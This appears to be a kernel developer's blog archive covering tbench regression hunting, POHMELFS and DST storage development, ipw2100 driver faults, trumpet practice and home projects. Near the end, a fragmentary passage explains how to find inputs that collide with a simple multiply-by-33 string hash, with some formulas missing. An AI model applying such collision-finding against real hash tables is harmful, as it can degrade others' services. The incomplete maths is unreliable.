After about 10 years helping to administrate 2ka.mipt.ru servers,
when we first time had known what is security, after I rooted that machine,
I decided to retire and switch my mail system to the different place
as I did with web long ago. 2ka server has too many problems which are
not fixed by admins and they are completely unmotivated to do so. Since I like
my emails, I'm sitching.
And since I started this, I decided also to switch blog-engine and domain.
Greet www.ioremap.net
My mail contact is zbr_ioremap.net now, and all 2ka mail will be forwarded there.
This blog will not be updated and will redirect you to the new location in 20 seconds.
See you in the new place, its cool and will be even better with time.
Andrew Morton expresed (somewhat angry imho :) lack of documentation
for the DST
as a review-stopper, so I cleaned up up some simple stuff he reported (like
style changs, kcalloc() instead of kzalloc(),
config dependency and other such things) and wrote about 500 lines of code documentation.
Not that much, but it is a bit more than 10% of the whole DST project:
I turned on my warm floor in the bathroom, and it's doing very well (I sometimes
move there just to warm oneself for a while, I will change windows next year,
since it is already quite cool).
Also created kind of a chair out of several stools stacked one on another,
since my table
is really high so requires appropriate chair.
I like my appartments more and more. I used to work everyday many years already,
not counting morning or evening, weekend or working days. The last 7-8 years I work
most of the time in the office, and I just did not like to work at home and did not know,
why.
I think now I know the reason: home place usually was not appropriately created and prepared.
Now with own loft, egoistically designed environment, custom-made things (like
table, specially designed for computer-like workload with lots of different
things used in conjunction), which I just love to have and work with,
with all that how my appartments are developed, I like to stay here (am I a misanthrope and egoist? :).
The last couple of weekends I spent here hacking on some projects (great thanks to The One,
who created datacenters and reverse tunnel in openssh), which is a very strange thing, since
I did not remember when I stayed at home more than a day and it was not related to some sickness.
Long ago I knew how hardware looks and actully made
some simple boards. Not with much success, but I did
not learn it at all, so did not expect anything serious
(in those days "Bugs"
was my favourite film, now I know a little bit more to understand,
that it was a bit wrong :).
Abr, who recently mastered his PhD, presented me (almost a year ago :)
a simple integrated circuit construction set:
K8055 -
USB interface board with 5 digital input channels and 8 digital output channels,
two analogue inputs and two analogue outputs with 8 bit resolution.
I spent half of the day soldering it today (it was quite simple task,
since board was already created and all details marked), and now board is ready.
Unfortunately I do not have appropriate USB connector (square one) to test
it, so it just lies here and reminds, that actually I do like such things very much.
Really very much, but know virtually nothing about IC, and even in the best days
in university I did not know even enough. I would like to start playing with IC now. Thinking...
It was reported recently that tbench has a long history of regressions,
started at least from 2.6.23 kernel. I verified, that in my test
environment tbench
'lost'
more than 100 MB/s from 470 down to 355 for 8 threads
between at least 2.6.24 and 2.6.27. 2.6.26-2.6.27 performance regression
in my machines rougly corresponds to 375 down to 355 MB/s.
I spent several days (please do not think that I'm bored and have
nothing to do: there are really interesting things to work with,
but since I already started...) in various tests and bisections (unfortunately
bisect can not always point to the 'right' commit), and found following
problems.
First, related to the network, as lots of people expected: TSO/GSO over
loopback with tbench workload eats about 5-10 MB/s, since TSO/GSO frame
creation overhead is not paid by the optimized super-frame processing
gains. Since it brings really impressive improvement in big-packet
workload, it was (likely) decided not to add a patch for this, but
instead one can disable TSO/GSO via ethtool. This patch was added in
2.6.27 window, so it has its part in its regression.
Second part in the 26-27 window regression (I remind, it is about 20
MB/s) is related to the scheduler changes, which was expected by another
group of people. I tracked it down to the a7be37ac8e1565e00880531f4e2aff421a21c803
commit, which, if being reverted, returns 2.6.27 tbench perfromance to the highest
(for 2.6.26-2.6.27) 365 MB/s mark. I also tested tree, stopped at above commit itself,
i.e. not 2.6.27, adn got 373 MB/s, so likely another changes in that merge
ate couple of megs.
Curious reader can ask, where did we lost another 100 MB/s? This small
issue was not detected (or at least reported in netdev@ with provocative
enough subject), and it happend to live somehere in 2.6.24-2.6.25 changes.
I was so lucky to 'guess' (just after couple of hundreds of compilations),
that it corresponds to 8f4d37ec073c17e2d4aa8851df5837d798606d6f commit about
high-resolution timers. I sent a patch, based on revert of the above commit,
to the mail lists and developers, unfortunately it is impossible to clearly revert
it in 2.6.25 not even talking about 2.6.27 tree. That patch brings
performance for the 2.6.25 kernel tree to 455 MB/s.
There are still somewhat missed 20 MB/s, but 2.6.24 has 475 MB/s, so
likely bug lives between 2.6.24 and above 8f4d37ec073 commit, but this excercise
I left to Ingo and Peter :)
Sigh, it is more than 3 A.M. in Moscow, I think if I would be on stronger than Linux
kernel hacking drugs, all my organs would run away from me long ago...
For the last several days I bisected 26-27 kernel at least 4 times,
trying to find out where the bug lives. Unfortunately all the time I ended up
with some obscure patches, which do not even touch x86 arch, not talking about
network. Like avr32 or s390 patches, which do not even show up in my config.
And I do have kernel version changesets between the two major releases, which
have 15 MB/s difference between them. I do not know how exactly bisect works
(I think it is a binary search in the changesets, but for example I
do not know if it enters merge commit or just gets it as one) in particular and git
in general, so I will do the last try to find the problem place in the 26-27 window
manually selecting changesets to try and check the result. If I will not succeed there,
I will move to the 23-24 and 22-23 windows with usual bisect and return
to the current tree later. I think I've found a way to run two tests in parallel,
so things may run a little bit faster... Second machine just started to test 23-24,
which has the biggest drop.
I do not understand.
Just can not get it: why is it so complex for me to reliably
play in second octave. I mean play and not just make a sound.
I can produce sounds upto concert F, maybe G/G# (trumpet G and A/A# accordingly)
in the second octave, probably sometimes higher (battery in my
KORG AW-1
tuner discharged), but can not play a simple trumpet A-A#-C-D-E-F
(concert G-G#-Bb-C-D-Eb) scale. It is just first-to-second octave,
and although I can play each sound, I can not play them in a line.
This day has come: the new, completely rewritten locking subsystem in
POHMELFS.
The release day!
Following changes were made:
The new distributed locking subsystem. Locks were prepared to be byte-range,
but since all Linux filesystems lock the whole inode, it was decided to lock the whole
object during writing. Actual messages being sent for locking/cache coherency protocol
are byte-range, but because the whole inode is locked, lock is cached, so range actually
is equal to inode->i_size. One can simultaneously write into the same page
via different offsets from different client, and every time file will be coherent on all
clients which do it and on the server itself.
Documentation update. Fixed by Adam Langley (agl_imperialviolet.org)
Add/del/show commands patch from Varun Chandramohan (varunc_linux.vnet.ibm.com)
Bug fixes and cleanups.
Get the latest version from
archive
or via GIT tree.
Alexandre Lissy (alexandre.lissy_smartjog.com) made a
patch
for the latest to date Valgrind version (3.2.1).
Now one can analyze performance bottlenecks with
netchannels applications
using standard techniques.
So far it produced not bad results. But not good either.
I see locking messages and they are in the right order and file content
is not damaged, but clients frequently give up on timeout waiting for
lock to be granted. Since locking release process requires inode to be
unlocked (so it could be found and locked by the thread, which received
network packet), this indeed may take too long on slow media and disks,
since locking has to wait until data is written, for example wait for writeback
completion or page reading, if they were note in the cache yet.
I tested
POHMELFS
locks in Xen domains, where network speed is limited
by 3 MB/s and writing one million (or ten millions, that may be the point)
8-byte entries at different offsets (sequential step of 128 bytes) took more
than 50 seconds, so 5 seconds default lock timeout could be not enough.
That's the theory, in practice I need to test different timeouts and actually
run on real machines, but here comes another problem. I have three quite fast
SMP machines with lots of RAM connected over gigabit ethernet, which can be used
whatever I like. But...
The first one was essentially killed by
tbench regression
testing. They all have long history of problems with disks or SCSI controllers,
now it happens again: the first machine boots only with single 2.6.22 Debian kernel,
anything else (including vanilla 2.6.22) fails to read data from the software raid
partition, although disks are detected correctly.
Another machine is actively used by aforementioned tbench regression testing,
it takes quite long time to boot it and run tests, so things are slow enough.
And the last one is used to control IPMI, since it is the only way I have to reboot them,
so when I managed to freeze all three, I needed to contact people who needed to contact people,
who needed to hard reset machines in datacenter and put them into BIOS, since existing
KVM switches are stupid enough not to respond to keyboard when machine died.
So, I'm a bit forced to spread efforts in several different directions,
but nevertheless there is a little bit of time for the new things:
$ ./elliptics -c ./elliptics.conf
2008-10-07 01:03:39.430198 12778 Logging has been started.
2008-10-07 01:03:39.430559 12778 Successfully initialized 'sha1' hash.
2008-10-07 01:03:39.430641 12778 Node id: b551803fd74ff5590ed38f6ce8a10a2e577b2a9e
2008-10-07 01:03:39.431076 12778 Server is now listening at 127.0.0.1:1025.
$ cat elliptics.conf
#
# This is a simple config file for the elliptics network.
# Note, that spaces are skipped before and after the '=' delimiter.
#
log = /dev/stdout
hash = sha1
id = This is id string
#numeric_id = 1234567890abcdefffffffffffffffffffffffa
root = /tmp
addr = 127.0.0.1:1025:2
#addr = ::1:1025:10
That will be an excellent project (maybe even my best one to date :),
which will be used in... More details when things are ready.
I like the idea, so maybe it will give a name for my new site, like
noelliptics.net. Not yet though.
That's how my shower cabin and bathroom corner look now.
It took me virtually years to make this, but practically a day to install the cabin,
and still bathroom is not completed yet. I need to finish tile glueing and water
hatch installation.
Also need to complete brick tiles glueing (roughly 7 sqare meters of walls in kitchen),
which likely will be done with bathroom glueing.
There is a lot of work, but actually not that much as may look from the first view.
I just need a special development mood to start doing it good and fast, which, as a muse,
does not come on demand.
I've completed a small rewrite of the distributed locks in
POHMELFS.
They can be byte-range, but since Linux VFS locks the whole inode
during writing, I decided first to implement simpler apporach,
so although clients send byte-range locks, server locks the whole
object.
If there is a simultaneous writing to the object, only one writer is allowed
at a time. Write locks are grabbed at write time, read locks at read time. Writing
is still handled via writeback, so all caching facilities persist. Locks are 'cached',
i.e. if inode was locked and no one else tried to update it, no new lock messages
are sent between server and client. Lock release message (initiated by another client,
who wants to start writing into the same file) forces inode writeback on the current
lock owner.
I've started a testing process, so far quite trivial, but I plan to write a simple
application, which will simultaneously write into the same file from different clients
into different offsets (like first client writes each second byte, second client writes
each third byte and so on) and check the result. If everything is ok, I will release a new
version this weekend and start implementation of the really cool distributed facilities
I plan to have in POHMELFS. It will be first implemented as a library, so that anyone could
use it to create a distributed storage without patching a kernel (but with own API though,
I do not want to mess with FUSE).
After I found
a small fix for tbench regression over loopback, I decided to run some tests with it.
As was expected, turning off TSO/GSO does not fix the whole issue, performance was increased from 366 MB/s upto 381 MB/s,
which is still less than 398 MB/s for 2.6.26-slub.
Another interesting issue I found, is SLAB vs SLUB difference. The former is always faster (about 5-7 MB/s difference):
366 vs 361 MB/s for 2.6.27-rc7 and 381 vs 374 MB/s when TSO and GSO are turned off. Pekka Enberg suggested to revert
5595cffc8248e4672c5803547445e85e4053c8fc commit, which could result in this performance degradation, but without
this commit SLUB behaves a little bit slower: 372 vs 374 MB/s.
I will try to find out why there is a huge drop between 2.6.23 and 2.6.24 (54 MB/s) next.
It brought me back about 5% in Xen domain with 256 MB of ram
in 4-clients tbench test:
current: 187 MB/s
patched: 194 MB/s
Patch is rather trivial: it disables TSO and GSO in loopback
and generically on devices which are capable of scatter-gather
(where it was automatically enabled by e5a4a72d4f8 commit, which
I biseced to be guilty). Actually TSO disablement part provided more gain than GSO on SG devices.
Idea behind patches is clear: we create bigger packet, so we should have
smaller overhead of its processing, but apparently GSO/TSO packet creation
overhead dominates in loopback at least.
My all three (big) test machines died in various (apparently unbootable) bisections,
so I tested it in small and very slow Xen domain. Because of that I did not run
2.6.22 kernel, since git operations and compilation take ages on this 'machine'.
For example I was only able to perform about dozen or so git checkous/resets/bisections
and compilations for the whole day.
I've posted patch to the netdev@, let's see the result.
Forgot to mention, that I wanted to sell this patch for the DST, POHMELFS or netchannels
patch review next time I will post them :)
It was reported, that starting from 2.6.23 Linux kernel has a continuous
network-related regression, which results in more than 20% performance degradation.
I checked it, and got interesting results.
It is better one time to see, than 1000 times to hear it.
Yes, we suck!
I decided to try to fix this issues, and started to bisect 2.6.22->2.6.23 and 2.6.26->2.6.27 on
two identical machines, which have 4 logical CPUs (HT enabled) and 4 GB of RAM.
Result was quite surprising: second bisection in the 22->23 froze machine
in the middle of the compilation, and first bisection in the 26->27 did not boot.
Since I ran it remotely, no progress on this til tomorrow.
Finally it looks like there are no killing bugs
or noticebly bad features in the distributed storage,
yesterday I pushed a change to drop wrong debug, which may resulted in a crash, also couple
of comment cleanups are waiting to be pushed, and likely that's it. It will be the last release,
if there will be no new feature requests or bugs found.
So, I switched back to the POHMELFS
development from DST.
To be really cool in cache coherency collisions, POHMELFS requires new locking/coherency mechanism, which
I implement similar to MOESI cache coherency protocol.
Which basically means a floating lock for given object,
which may be owned by only one client at a time not counting readers, they just receive a message, that theirs
data is not valid anymore.
First, I changed userspace management of the inode cache: now there is only single tree of all objects,
which were ever opened by any client. When client disconnects or drop inode locally, it is removed from the
server's cache also.
Next, there will be a special command to acicure grab/release a lock, which is only being sent by writers.
When writer starts its dirty job of damaging shared data, it sends a lock grab message to the server with
requested range, which in turn is broadcasted to the other writers, only single writer is allowed to own given area.
Then server proceeds with its usual tasks of cooking or waiting for IO. Eventually owner of the lock
decides to release it, for example after above message from the server it can flush data to the server
and send lock release message or just on its own. So server checks if given area is now free and sends lock
comepltion message to the requester. New owner receives the message, mark inode as own and starts writing there.
Any subsequent writing, if inode is marked as owned, does not end up with additional lock message.
So far looks doable, but I only completed what is called 'first' above :)
If there will be no major problems with other project, I plan to complete this part quickly and move furward.
This happens during PCI ipw2100 device disablement in the reset handler,
so when interrupt handler sees that, it bails out. It should be generally ok,
but I found a different thing: there is a race between interrupt handler (handler
itself and related processing tasklet) and
reset code. The latter disables interrupts before starting to turn adapter on,
but interrupt handler can run right now on given cpu and can schedule
the tasklet, so its disablement does not prevent parallel reading and writing of the
various registers.
IRQ processing tasklet does register reading and writing under the lock with interrupts
turned off, but reset tasklet does not protect initialization path against it, so I wonder,
what may happen in this case. Since register reading and writing happens from absolute
addresses (I meant there is no need to write address register first), this maybe not a problem,
but still race exists and theoretically can harm the system. Similar unguarded accesses exist
in ipw2100_wx_event_work() handler, and also there is unguarded status field setting
in various places in the driver, which can harm the driver's behaviour too.
So, maybe I decided to blame firmware a little bit early, although found things may
be harmless. I will try to figure this out later tomorrow.
I was not able to force card not to send or receive packets
with ping tests, although definitely was able to generate lots
of fatal interrupt with completely different values and addresses.
Frequently card generates fatal interrupt with different values on the same
address, like below:
They did not follow one after another though.
Different error values likely mean, that there is no any correlation between
values and addresses, so this information is useless.
I added power state changes to the reset function, so now it does something like that:
As we can see, fatal interrupts did not dissapear, and are actually as frequent as before.
Also got this lines:
[ 2032.560413] ipw2100: exit - failed to send CARD_DISABLE command
[ 2032.560449] ipw2100: exit - failed to send CARD_DISABLE command
[ 2032.560491] ipw2100: exit - failed to send CARD_DISABLE command
[ 2032.560593] ipw2100: exit - failed to send CARD_DISABLE command
One after another, which does not provide me any clue though.
I've started several big torrent downloads/seeds as a big load, maybe card somehow
differentiates different flows, so this test should be more heavy than lots
of pings. First time I noticed fatal interrupt problem with this kind of load,
when card not only stopped to work, but also printed some goodbay message.
So far conclusion is not very optimistic: fatal interrupts happen always, no matter
what magic is enabled in the reset, which already tells that firmware is broken.
Hopefully additional reset games with power management will allow card to work,
even with those interrupts. Time will tell.
This is a maintenance release, which contains following changes:
Use idr to manage minor numbers. Now create/remove/create sequence does not
produce new minor, but uses previous one, which is now freed.
Added cache name to the node. It is possible to have freed node still
being alive while we register new node with the same name, so its cache name should be different.
Wait during node removal until there are no pending transaction, so node would be
freed in process context and not in the receiving threads itself.
Warn user if there is no security permission config file during
export node initialization. No client will be allowed to connect
without explicit security association.
Tune default size of the page pool for crypto processing a bit.
I want to thank Remy Ritchen (remy.ritchen_gmail.com) for his excellent tests and analysis.
As usual, DST
is available from archive and via
git tree.
I managed to compile small enough kernel, which boots on
my laptop (do not know how long it took, since fell asleep),
and managed to bring fatal interrupt error just after several seconds
of ping -f 192.168.1.1 -s 8192 on freshly booted
machine. 192.168.1.1 is my gateway address.
Here is the result with the patch I posted to the mail lists,
which was not acked, replied and commented though (well, I have to admit,
that if I would send it couple of mails earlier, it could probably find its
way into the tree, but I still believe that it would not result in anything,
since everyone knows about this bug, it just is not fixed by some reasons).
Intel developers (at least those who maintain the driver) continue to keep silence.
So, this fatal error value and address numbers do not tell me anything,
but since they are always different on different addresses, I think firmware
just loses its mind and stops responding.
The first line, where ipw2100 fails to send a command, was obtained during
ifdown of the interface. I never saw it before, but do not think
it is related though.
So, I need to move to the office and want to make some
distributed storage
changes, namely fix an issue with name collision (kernel already has a dvb card, which
module is called dst.ko), and implement better minor number allocation
scheme for the imported devices, since right now after node was created and distroyed,
new one will not get the same number, but continuously increasing one, which looks
confusing and may bring a sysfs initialization error (when system tries to
register kobject with existing name).
I will continue ipw2100 experiments today's night if will not fall asleep again
because of jetlag. Stay tuned!
Last couple of photos were made at Linux Plumbers Conference (filesystem bof).
Not all of them got into the gallery though, I need to try to find missing bits.
I needed to get a real flash instead and do not use build-in one, which sometimes mangled the images...
Actually I think I like this city much more than when just saw it.
It is small, but still alive, it has parks and river as long excellent coast to
walk at (without access to water though, since it is navigable). There are
interesting buildings and lots of places where to take a seat like restaurants,
cafes and pubs. Once heared live jazz music from the street, but was suggested to
visit Ostin: capital of the live music in the USA.
So, couple of photos
of Portland I made (without any artistical attempts). Several KS and Plumbers photos are pending.
Just sent a patch to
zillions of maillist (netdev@, linux-kernel@, linux-wireless@) and
to lots of developers because of its Fatal interrupt. Scheduling firmware restart.problem.
Let's see if Intel folks will do anything.
Also added couple of jokes about conspiracy theories (like bug fires because Intel
forces us to buy a new adapter by this error) to make it a little bit more flameable
and to bring attention. I really hope Intel does not do it intentionally.
Neat toy! Computer itself actually has a size of the finger (not that thick though),
but it does not have a power supply and interface connectors, so essentially unusable
as stand-alon board, but with extension motherboard (as on the picture) it becomes very
interesting with several usb connectors, hdmi display and audio connectors.
WiFi/bluetooth module is based on wi2wi W2CBW003 Marvell 88W8686 chip. Pretty much
unlikely Marvell will share a documentation (on my experience if you do not
get more than 1000 chips in single order you will not be allowed to enter
its intranet and get access to the needed datasheets), so I will not be able to work
on wireless driver, but I would gladly implement it otherwise.
First, Portland met me with the excellent weather. Just bloody perfect one,
about 25-30 degrees Centigrade, now rain or cold winds. Very nice.
Second, hotel is quite good, with couple of exceptions though: they do not have
european-to-american electricity socket adapter. They do not even have a meter of wire,
so that I could create it myself. They have american to UK one though.
There are no 24 hours opened shops except Starbucks. I found one small food shop though,
which did not
sold me a bear until 7 AM, I was wished a good breakfast with 6 bottles of Bud.
In Moscow it was 6 PM. Actually currently I think I already do not suffer from
the jetlag, although wake up at 4-5 AM local time.
Portland is a quite small city. I managed to walk around central district
for several hours. And it is slow. In that regard, that there is no
some kind of a life flow, no energy, no drive... It is likely a perfect place
to raise childrens or draw pictures (Portland has excellent nature) though.
I made several photos during the walk around the city (even listened
for live music in so called Portland Saturday Market, where people sell
hand-made stuff, there are couple of real gems there I think)
as long as Linux kernel summit
ones, but becaue of slow internet access I will not publish them yet, expect gallery
update in a week or so.
This is maintenance only release of the
DST, which brings us following changes:
Fixed memory leak in crypto thread initialization error path. Noticed by Sven Wegener (sven.wegener_stealer.net).
Unprotected tree access (exceptionally stupid bug, I was made blind by the electronic equipment), and tricky bug_on catch in scsi
code caused by incorrect bio flag initialization in the exporting node. 64bit alignment fix.
Bugs reported by Rémy Ritchen(
Couple of bogus compilation warnings about unintialized variables cought by different compiler.
Allow both hread and write permission, not only read or write in security config.
int scsi_setup_fs_cmnd(struct scsi_device *sdev, struct request *req)
{
struct scsi_cmnd *cmd;
int ret = scsi_prep_state_check(sdev, req);
if (ret != BLKPREP_OK)
return ret;
/*
* Filesystem requests must transfer data.
*/
BUG_ON(!req->nr_phys_segments);
Which means that request structure did not contain any segment to process. Origianlly
I thought that it is because of some tricky elevator steps, which selected wrong request queue
because of all debug showed, that sync bio (block IO request with BIO_RW_SYNC bit set)
is handled differently compared to the same request without this flag. But experiments with various
flags showed, that bug occurs no matter how, but just in completely unpredictible place.
Fortunately I managed to catch it in a debug trap in block IO merging path, which showed me, that
block IO requests with very srtange read/write and flags fields was a cause of this error. Looking more
precisely to the block queue allocation path, I found, that its default initialization is not correct,
and my setup happens before it, so it did not contain the right parameters for the maximum request sizes
(hw and phys sectors). This also showed, that one block IO request in the export node had clone and other
local-only fields, which is very wrong for the bio to be submitted, which actually resulted in the seen bug.
Those fields were set by the client bio and should not be transferred to the remote one, so I only limited flag fields
to show that bio is uptodate and have blockable IO bit.
That's the story about how things were hacked this day (its a middle of the night actually, while I'm waiting
for the taxi to move to the airport), so
POHMELFS locking algorithm
was not implemented today, and likely is postponed to the next weekend when I return, since I got a
group theory book and made some prints about numbers theory (after completed reading Vinogradov's book),
so I will have what to read in all four planes (two in each direction) if I will not fall asleep,
and likely I will not have much time in Portland:
we will need to talk/listen to other people and check local pubs (people suggested some coctail places, but I prefer
beer).
I completed design (without implementation yet :) of the new
locking (or cache coherency mechanism, it does not really matter)
for the shared objects in the
POHMELFS.
It is somewhat close to the MOSI (even MOESI) cache coherency protocol,
used in modern CPUs, although also differs a bit because of the nature
of the POHMELFS server. It can provide byte-range locking for any object,
but so far I will only implement per-file locking (i.e. the whole file will
be 'locked' or 'owned' when client performs a write, even if another client
could write to the different location in the same object), and if scalability
will not be good enough, it can be extended (not that complex though). Since
all in-kernel filesystems lock the whole inode when performing a write,
this should not be a big problem.
This approach requires to change POHMELFS server's directory cache, but I
never liked existing one, since it looks a bit over engineered.
If things will go smooth, I will complete it tomorrow before flying to the kernel summit
(saturday early morning), since idea is really not very complex as long as I expect
implementation to be.
Meanwhile, DST
got a fix for the incredibly stupid bug I made, even do not want to call this
'bug', it is likely a tricky created blindness by the electrons moving things around in my
monitor. They forced me not to see an obvious place to lock access to, which resulted
in a nasty oopses. Patch is already in the
git tree.
There is another one though: when some SCSI device is being exported and client performs a
write, request has somehow zero req->nr_phys_segments field (which should
be initialized from block IO request), which catches a BUG_ON() in the scsi
code. I'm working on it right now.
Playing this known and not too complex song today.
Trumpet has an excellent sound here imho, although I did not always produce
it. Frequently vibratto was mixed into the music, so it became not very interesting.
Nevertheless, when I succeed (note, that I only played it first time today
about 30-40 minutes, so it was not very frequently cool with my trumpet
'experience', maybe one third :), I do like it. Also 15-24 part was not clear to me,
since I do not remember this part of the original song, so played just via
intervals, which sounded, but I think not too good.
Also tried to improvise in blues pentatonism.
Not with much of a success though. I can play notes and move over the
row with different steps, but it does not sound very good. Likely because
I do not know intervals and what is being sounded does not feet interesting timing.
Unfortunately couple of books and articles about improvisation I have contain too specific
for the musical theory terminology, so I frequently just do not understand, what's that.
Quite interesting happend to play some random mix of sounds and select those
sets of 3-7 ones, which sounded cool.
This looks like blind man is trying to walk around, but nevertheless I like it...
Stay tuned, maybe eventually I will record some random 'music' I produce out of my trumpet :)
I found quite simple and interesting to transpose sounds from trumpet
pinch to the piano one, i.e. by increasing sound by two tones. It is not
that complex as I tought before, but if you already know the melody,
I can play from the script (very slowly and without half-tones though),
but can not transpose in a real-time.
Also found, that playing pedal tones in a mix with the highest (for me
it is very end of the second octave) register does help to bump the highest
notes, and also makes lips no tire quickly. Actually after hour exercise
today they almost were not tired because of it.
Found some interesting sounds and started to think about music theory.
I play not very good, but I will eventually, it is a matter of a practice.
But I completely do not know music theory, but want to put my musical thoughs
into the sound. Usually I fail, so want to fill this gap.
I think I need to start with the harmony, so searching for a good book about it.
This is a very minor
DST update,
which contains following changes:
sector_t compilation warnings removed.
Debug, init, alloc, whatever cleanups noted by Sven Wegener (sven.wegener_stealer.net).
S o m e c h e c k p a t c h . p l m a s t u r b a t i o n
New name: "Linux benevolent dictator said: there is no spoon, black and white"
Actually I fixed only small amount of the crap returned by checkpatch.pl,
particulary I did not fix cases of long lines, when it is actually a comment added after
some variable, or things like
for (i=0; i<n; ++i) and
struct some_name
{
...
}
when checkpatch.pl wants
for (i = 0; i < n; ++i) and
struct some_name {
...
}
But tried to remove more than 80-characters code strings, trailing spaces and
couple of other warnings.
Now I will concentrate on POHMELFS
locking and then distributed facilities. Stay tuned, new version will be extremely cool in this regard!
Network channel
is peer-to-peer protocol agnostic communication channel
between hardware and userspace. It uses unified cache to store it's
channels. All protocol processing happens in process context.
This release brings us reworked (and very simple) unified
storage for all kinds of protocols (netchannel can be created for any kind
of the protocol), completely lockless data processing
(data queueing into the netchannel and its lookup in the global
storage are protected by RCU), simplifed interface.
Feature list:
Very high bulk performance with small packets
(check userspace network stack
for more details).
Completely lockless netchannel processing (packet queueing and netchannel lookup in the global storage are protected by RCU).
Unified storage for all kinds of protocols: TCP/UDP, IP/IPv6, whatever you decide to implement on top of hardware layer you use.
No protocol processing. This is pushed to the peer itself. For example to the
userspace network stack.
Ability to inject packet into the network without root priveledges.
Unetstack
is an extremely small and fast TCP/UDP/IP stack implementation on top of packet socket or
netchannels interface.
This release includes sync with the new netchannels interface,
dropped routing table support, since userspace network stack is designed on
behalf of netchannels and thus efectively single opened object operates
with single source and destination peers, so there is no need to
introduce unneded caches, since all needed information can be stored in
the userspace network stack object itself.
Or is it correct to write 'trumpeting in Bb'? When I play
some piano notes from the original scripts, it sounds as expected
(maybe lower because of the trumpet pitch, what I'm trying to figure out),
but I wonder, if playing the same note in trumpet pitch is correct?
For example trumpet C is actually a piano Bb, so when I see
C note in the piano script I play trumpet C, which produces Bb sound,
which may be wrong.
Another problem is melodies where sound flows between two octaves in single
part. When I play 'He's a pirate' from small octave to the first one, it sounds
good, but when I rise to the first to second octave, I rarely can play second F
and higher (well, I rarely play higher single sound than 2F anyway),
although I can quite reliably produce single 2F, maybe even 2G if not too tired.
But not in a melody.
Actually I can play a scale upto and down from 2F easily, but not when previous sounds
do not form a simple ascending or descending sequence. Of course I understan that my
several month old 'skills' are not mature yet, but would like to find where the problem is.
Everyday 1-1.5 hours exercises just make lips tired, looks like progress stalls.
Need to check Louis Maggio's brass book for the answers :)
When NIC's interrupt fires in Linux, driver's handler
does not process the packet, it either schedules NAPI handler,
which will push packet higher to the stack, or submit packet to
the software interrupt handler, which will do the same. This is
the first queue: interrupt->fotware interrupt (or NAPI, which
happens in the same context).
When NAPI polling handler (or networking software interrupt) fires,
it searches for the appropriate receiving socket, adds data packet
to its queue and wakes up a receiving process. This is second queue.
Netchannels currently work the same way, since its receiving processing
happens in netif_receive_skb(), which already may be too late
for some low-latency applications.
As was noticed by Salvatore Del Popolo, it is possible to queue packet
into netchannel in netif_rx(), but that will limit netchannels to
only work with non-NAPI drivers. Instead I think about creating a special
helper which will be invoked from the interrupt handler and if there is no
appropriate netchannel to queue data into, it will schedule NAPI or network
softirq. So far this is in todo list though.
What was really done, its a complete rework of the initalization process,
netchannel creation and allocation and its processing. Essentially I rewrote most
of the netchannels subsystem for good. It became lockless (RCU protected,
there is a hash bucket lock, which is only used when netchannel is added/removed
from the bucket, searching is lockless), but allocation process
is slower, since netchannel now contains array of the skb pointers, which is allocated
at creation time. Size of the array is limited to maximum number of packets netchannel
can hold, kind of queue size.
Or finish one. Depending on the point to look from.
zbr@gavana$ make SUBDIRS=net/core/netchannel/
WARNING: Symbol version dump /home/zbr/aWork/git/linux-2.6/linux-2.6.netchannels/Module.symvers
is missing; modules will have no dependencies and modversions.
CC net/core/netchannel/netchannel.o
CC net/core/netchannel/storage.o
CC net/core/netchannel/user.o
LD net/core/netchannel/built-in.o
Building modules, stage 2.
MODPOST 0 modules
zbr@gavana$ wc -l net/core/netchannel/*.c include/linux/netchannel.h
430 net/core/netchannel/netchannel.c
140 net/core/netchannel/storage.c
244 net/core/netchannel/user.c
92 include/linux/netchannel.h
906 total
I want to make a new netchannels
release this weekend. It will not contain dynamically resizable hash table though, but if there will be no major
bugs in the core, I will consider to complete it for the new release.
I also plan to convert userspace network stack
to the libtcp.so or libunetstack.so library, so it could be much easier to create applications
with this stack, no matter if implemented on top of netchannels or packet socket, but so far it is only in plans.
Although it will be released only next week, good people shared it with me.
What can I say: I did not buy previous one, I think after
"Garage Inc" and "Symphony Metallica" they made real crap, including "St. Anger",
but "Death Magnetic" is better. Much better.
It sounds somewhat similar to "Reload", but unfortunately there are no killing
songs like "Fuel" and "The Unforgiven 2", which, in my opinion, were the best songs on that album,
although there is a song with piano intro. Called "The Unforgiven 3".
Nevertheless "Death Magnetic" is a good album. Not the best, not something new and exception,
just good.
That's how my self-made table looks.
It was made out of old enter wood door. Table's geometry is roughly 2000x1500 mm.
Table has single steel leg (I thought to continue it to the
ceiling and put some shelves on it, but it is future development,
if will be started at all) and is attached to the wall and was made
as windowsill continuation.
Now I need to get a good computer chair and install several book shelves on top
of the left side of the table (which is located at the left of the window on
the picture), since books and prints are scattered all over the room.
While searched for the wood screws in the cellar, found a special ceramic tile
drill, and although I'm pretty sure it will not be enough to drill lots of holes
in my tiles, I will be able to create 2-4 holes for the shower cabin and shower
guide.
Also finished bottle X-shelves.
Will install them later though. Also I do not have enough bottles (of whatever) to fill it right now,
there are 24 cells in the shelves.
Exploit
takes multiple hash values and searches for data which will produce the same hash
value (it prints it to stdout as one can see above).
Since this hash is so simple, it is actually possible to find matching
data using brute force, but it is not interesting.
Exploit can not work, if we limit the smallest byte value to something except 1 or 0.
Since we do not know actual value of the hash, but only its modulo for 2^32,
there is a possibility, that given value can not be represented as sum with
fixed multiplicators of the bytes we can operate on (like we can
not represent 13 as sum of whatever positive integers, if the smallest one is bigger
than 6). But it is always possible to
represent any value in the system where the smallest possible byte is zero.
Because of the above limitation for the smallest byte value, every hash can be
matched by the array of at most 7 bytes (33^7 is bigger than 2^32).
I want to think some more on the cases, when we we know only modulo (by dividing
real result by 2^32 for example) of the result, but we have to find input bytes,
so that hash on them would match required one, and input bytes are limited by some
set, and the smallest byte is not 1 or 0. This can be tricky task...
value
where initially hash was set to zero, and data[i] means i'th byte of the
input data.
This can also be written as following:
hash = hash + hash << 5 + data[i];
Now, let's take a look at hash analysis.
As we can see, final hash is a sum of the multiplication of the power of 33 and data bytes.
Let's split sum into neighbour pairs, like following (assuming big enough number of input bytes n):
Now let's check single multiplier using above shift equation for the multiplication:
33*a[k] + a[k+1] = a[k] + a[k] << 5 + a[k+1]
Using any other multiplier, which does not result in a[k] + a[k+1],
will lead to worse distribution, since number of used bits decreases. Particular bad (if not the worst)
multplier is 31, which leads to the following sum:
31*a[k] + a[k+1] = a[k] << 5 - a[k] + a[k+1]
This hash will have too small active bits, particular only differece between neighbour bytes
will play a role in the final hash production.
Now, getting the history of the hash, namely its part, which tells us that hash was first introduced for strings,
we can conclude, that above 5 bits shift is used to shift a value to the amount of bits needed to put there new
